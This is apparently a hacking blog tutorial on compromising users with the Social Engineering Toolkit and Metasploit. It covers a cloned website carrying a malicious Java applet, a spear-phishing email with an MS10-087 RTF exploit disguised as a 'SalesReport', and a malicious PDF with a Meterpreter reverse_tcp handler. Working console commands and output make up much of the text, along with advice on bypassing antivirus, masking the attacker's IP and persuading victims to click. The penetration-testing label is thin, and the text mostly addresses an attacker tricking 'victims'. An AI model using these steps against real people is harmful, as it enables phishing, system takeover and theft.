Web Attack Vectors with Java Applet !

The Java applet attack is one of the most successful attack vectors in SET and has the highest success rate for compromise system. Popular because we can create the infected Java applet very easily,we can clone any site we want that will load the applet very fast and successful because it affects all the platforms.The only difficulty is how to deliver the Java Applet properly in order to trick our victims.
The Java Applet attack will create a malicious Java Applet that once run, will completely compromise the victim. The neat trick with SET is that you can completely clone a website and once the victim has clicked run, it will redirect the victim back to the original site making the attack much more believable.

The Java applet Attack vector affects:

    Windows Systems
    Linux Systems and
    Mac OS X
We are opening the Social Engineering Toolkit and we choose the option Website Attack Vector.
                  

you need to select 2 and then press enter:

In the next menu we will choose the first option the Java Applet Attack Method:
                                                    

In the next section, we will see there are three options:
                                 

The option site cloner would be used in order to recreate the website of our choice that will carry the malicious Java applet.

Now in the next menu, it will ask are you using NAT ?
Set yes if you use !
                                             
Enter the URL of your choice and click enter. Here i am using www.hacxorprogramming.blogspot.in  but you can use any  website you feel comfortable that can trick the users to run the Java Applet.

The next part is to decide which payload it will be used.There is a variety of available payloads that SET provides but here we have chosen to use a simple Windows Shell Reverse TCP :
                          

                                               
You have now succesfully cloned a website, but you're not done. Now you need to bypass anti virus software for this to actually  work. we have chosen the Backdoored Executable which is the best choice there:

The next option has to do with the port of the listener.You can press enter in order the SET to choose the default port which is 443.
     
Our next step now is to try to find a way to mask our IP address in order to have a domain that will look original.We can register a domain or we can use any of the online shorten URL services to hide our IP when we will send the link to our target.

Note : If you had changed the configuration file to include WEBATTACK_EMAIL=ON, you
would have been prompted to send an email using the spear-phishing attack vector
(minus attachments).

Now that everything is set up, you simply need to get a target to browse to the malicious site. Upon reaching the website, the target sees a pop-up warning from the publisher. If the target clicks Run, and most users will, the payload will be executed, and  you gain full control of the user’s system.


Now it’s up to you to convince your victim to click on the link but once they do they will be brought to your cloned website and an  “accept certificate” window will pop up. If they click on it and Back at our attacker machine, the Meterpreter session is successfully established,

Social Engineer Toolkit (SET) tutorial for penetration testers!

Social engineering is the act of getting people to give you the information you seek, usually by gaining their trust. That trust may be gained by posing as someone in authority, a colleague, or just someone who needs help. The purpose of SET is to fill a gap in the penetration testing community and bring awareness to social-engineering attacks. The  toolkit attacks human weaknesses, exploiting curiosity, credibility, avarice, and simple human stupidity. Socialengineering attacks are at an all-time high and have always been a large risk for many organizations.
The current version of the Social Engineering Toolkit includes the following types of attacks.
 
Spearphishing
Websites
Infectious Media Generator
SMS spoofing Attack vector

Spear-Phishing Attack Vector :
The spear-phishing attack vector specially crafts file-format exploits (such as Adobe PDF exploits) and primarily sends email attacks containing attachments to a target, which, when opened, compromise the target’s machine. A spear-phishing attack is similar, except that it targets one or a few individuals. In other words, it’s a targeted social engineering attack, hence the spear.

Let’s now select number 1 from the menu and begin our spear-phishing attack.
It explains what a spear-phishing attack is and asks us how we want to go about our attack. We can choose:

 set> 1

 The Spearphishing module allows you to specially craft email messages and send
 them to a large (or small) number of people with attached fileformat malicious
 payloads. If you want to spoof your email address, be sure "Sendmail" is in-
 stalled (apt-get install sendmail) and change the config/set_config SENDMAIL=OFF
 flag to SENDMAIL=ON.

 There are two options, one is getting your feet wet and letting SET do
 everything for you (option 1), the second is to create your own FileFormat
 payload and use it in your own attack. Either way, good luck and enjoy!

   1) Perform a Mass Email Attack
   2) Create a FileFormat Payload
   3) Create a Social-Engineering Template
  99) Return to Main Menu

Let’s select a FileFormat attack. Type number 2 and press enter.

set:phishing>2

 Select the file format exploit you want.
 The default is the PDF embedded EXE.

           ********** PAYLOADS **********

   1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
   2) SET Custom Written Document UNC LM SMB Capture Attack
   3) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
   4) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
   5) Adobe Flash Player "Button" Remote Code Execution
   6) Adobe CoolType SING Table "uniqueName" Overflow
   7) Adobe Flash Player "newfunction" Invalid Pointer Use
   8) Adobe Collab.collectEmailInfo Buffer Overflow
   9) Adobe Collab.getIcon Buffer Overflow
  10) Adobe JBIG2Decode Memory Corruption Exploit
  11) Adobe PDF Embedded EXE Social Engineering
  12) Adobe util.printf() Buffer Overflow
  13) Custom EXE to VBA (sent via RAR) (RAR required)
  14) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
  15) Adobe PDF Embedded EXE Social Engineering (NOJS)
  16) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
  17) Apple QuickTime PICT PnSize Buffer Overflow
  18) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
  19) Adobe Reader u3D Memory Corruption Vulnerability
  20) MSCOMCTL ActiveX Buffer Overflow (ms12-027)


After we select our FileFormat type attack, we will be asked what type of exploit we would like to use. Notice that the default is the
PDF with the embedded .exe. In this hack, let’s use the Microsoft Word RTF Fragments attack (or MS10_087)

set:payloads>4



   1) Windows Reverse TCP Shell              Spawn a command shell on victim and send back to attacker
   2) Windows Meterpreter Reverse_TCP        Spawn a meterpreter shell on victim and send back to attacker
   3) Windows Reverse VNC DLL                Spawn a VNC server on victim and send back to attacker
   4) Windows Reverse TCP Shell (x64)        Windows X64 Command Shell, Reverse TCP Inline
   5) Windows Meterpreter Reverse_TCP (X64)  Connect back to the attacker (Windows x64), Meterpreter
   6) Windows Shell Bind_TCP (X64)           Execute payload and create an accepting port on remote system
   7) Windows Meterpreter Reverse HTTPS      Tunnel communication over HTTP using SSL and use Meterpreter


This will create a Word document that will overflow a buffer and enable us to put a listener or rootkit on the victim’s machine. Type
4 and press enter.
Now that we have decided what type of file we want to use in our attack, our next step is to decide what type of listener we want to
leave on the victim system.
we type number 5 and press enter.
Now enter the IP address for payload listener and press enter.

If we want to trick the victim into opening the file, we should name it something that sounds enticing or familiar to the victim.
Now this will differ depending upon the victim, but in our scenario we’re trying to spear a manager at a large company, so let’s  call it SalesReport, something he or she might actually be expecting in their email.

set:payloads>5
set> IP address for the payload listener: 192.168.121.128
set:payloads> Port to connect back on [443]:
[-] Defaulting to port 443...
[-] Generating fileformat exploit...
[*] Payload creation complete.
[*] All payloads get sent to the /root/.set/template.rtf directory
[-] As an added bonus, use the file-format creator in SET to create your attachment.

   Right now the attachment will be imported with filename of 'template.whatever'

   Do you want to rename the file?

   example Enter the new filename: moo.pdf

    1. Keep the filename, I don't care.
    2. Rename the file, I want to be cool.

Now that we have created the malicious file, we now need to create the email. This is important. If we’re to get the victim to open the file, the email must look legitimate. SET prompts us whether we want to use a pre-defined template or a one-time-use email template. Let’s be creative and choose a one-time-use email

set:phishing>2
set:phishing> New filename:SalesReport
[*] Filename changed, moving on...
   Social Engineer Toolkit Mass E-Mailer

   There are two options on the mass e-mailer, the first would
   be to send an email to one individual person. The second option
   will allow you to import a list and send it to as many people as
   you want within that list.

   What do you want to do:

   1.  E-Mail Attack Single Email Address
   2.  E-Mail Attack Mass Mailer

   99. Return to main menu.
  
set:phishing>1

   Do you want to use a predefined template or craft
   a one time email template.

   1. Pre-Defined Template
   2. One-Time Use Email Template

set:phishing>2
set:phishing> Subject of the email:Report
set:phishing> Send the message as html or plain? 'h' or 'p' [p]:p
set:phishing> Enter the body of the message, hit return for a new line. Control+c when finished:This is report on sales. If you have any question, please feel free to ask
Next line of the body:
Next line of the body: Sincerely
Next line of the body:
Next line of the body: Your Rohit
Next line of the body: ^Cset:phishing> Send email to:victim'sEmailAdress@Here                      

  1. Use a gmail Account for your email attack.
  2. Use your own server or open relay

set:phishing>1
set:phishing> Your gmail email address:EnterYourEmail@Here
set:phishing> The FROM NAME user will see: :Rohit
Email password:
set:phishing> Flag this message/s as high priority? [yes|no]:y
Finally, create a Metasploit listener for the payload to connect back to. When SET launches Metasploit, it configures all the necessary options and starts to listen on your attacking IP address on port 443

File Format Exploit !

File format bugs are exploitable vulnerabilities found within a given application, such as an Adobe PDF document. This class of exploit relies on a user actually opening a malicious file in a vulnerable application. Malicious files can be hosted remotely or sent via email.
In this tutorial I will give a demonstration how to attack client side using Adobe PDF Escape EXE vulnerability. Almost 95%(maybe)  Windows users have Adobe Acrobat (Acrobat Reader) application in their computer or laptops.

Here the first step is create a malicious PDF to use in this attack by using vulnerability in Adobe Reader .

msf >use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
msf >set payload windows/meterpreter/reverse_tcp
msf >set filename Important_Meeting_Notice.pdf
msf >set lhost 192.168.8.92
msf >set lport 443
msf > exploit

The next step is sending our malicious code to target e-mail. send it to your victim's.

After sending our malicious PDF files, we need to set up a listener to capture this reverse connection. We will use msfconsole to set up our multi handler listener. This will ensure that when the exploit is triggered, the attacker machine can receive the connection back from the target machine (reverse payload).

msf exploit(adobe_pdf_embedded_exe_nojs ) > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.8.92
LHOST => 192.168.8.92
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.8.92 :443
[*] Starting the payload handler...
msf exploit(handler) >

After the victim open our malicious PDF file there's an alert box guide victim to tick the "do not show this message again" and
click open. After the victim click open button, our listener start capture reverse connection.

We have successfully exploited a file format vulnerability by creating a malicious document through Metasploit and then sending it to our targeted user.
As a penetration tester, every bit of information can be used to craft an even better attack. Browser exploits and file format exploits are typically very effective, granted you do your homework.